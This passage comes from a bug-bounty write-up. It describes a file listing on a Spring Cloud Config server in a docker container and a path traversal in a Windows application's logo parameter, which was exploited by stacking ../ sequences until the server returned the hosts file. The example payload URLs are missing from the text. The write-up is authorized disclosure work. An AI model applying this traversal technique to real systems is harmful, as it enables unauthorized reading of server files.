I used this feature to list the contents of the root directory in the affected Linux server. In the root directory, I found a file named application.jar which was potentially the source code of the currently running Spring Boot Cloud Config server.

Also, the root directory had a file .dockerenv so I was quite sure that I was in a docker container.

However, Synack Red Team has the stop-and-report policy according to which, we are not supposed to do post-exploitation.

I reported the issue during the 8 hour initial launch period. And nobody checked for this particular vulnerability, so mine was the only report during that time.

Local File Inclusion in download.php

I have already discussed this vulnerability in my previous article and you can find it here:  Local File Inclusion In download.php

Path Traversal Allows To Download Licence Keys

This path traversal was also very interesting. This was in a custom-built application and it did not require any authentication.

When we visited the webroot, the web application redirected us to the login page.

The login page was custom built and there was a brand logo along with the login page so I cannot show you the screenshots.

Upon visiting the login page, a request to the /web/product_logo endpoint was sent. The request contained a GET parameter named logo.

Overall, the request URL looked like this:

The parameter logo took a file name as the input and returned that particular file in the response. In this case, it was logo.png.

Now, as this is functionality to read files, there may be a potential LFI/Path Traversal here. So, I changed the file name to random file names like index.html, index.php, index.js etc. However, none of them worked.

So, I ran ffuf hoping to discover more files but it was a failure. I used the raft-small-files-lowercase.txt provided in the SecLists.

I did not know the underlying technology which is used so it was quite painful to enumerate files.

However, I knew it was a Windows box because of the case-insensitive directory structure. What it basically means is that, in Windows, WinDows and Windows are the same directories/files as it is not case sensitive. And when I was doing my recon, I received the same response when I did /web or /Web so I was quite sure it was a Windows box.

There are other ways to determine this too but I decided to assume it was Windows.

Same as my past submissions, I decided to read the C:/WINDOWS/System32/drivers/etc/hosts file of the remote server.

So, I used a path traversal payload and the final URL looked like this:

However, one ../ sequence did not work. So I kept increasing the ../ sequences.

Finally after 10 ../ sequences, I finally hit the hosts file and the server retrieved it for us.

The final payload looked like this:

The post Path Traversal Paradise appeared first on Synack.

The difference between the Dark web and Deep web? Clearnet Lets first start off by...

The post Dark web and Deep Web explained and how to access it. appeared first on Aeternet.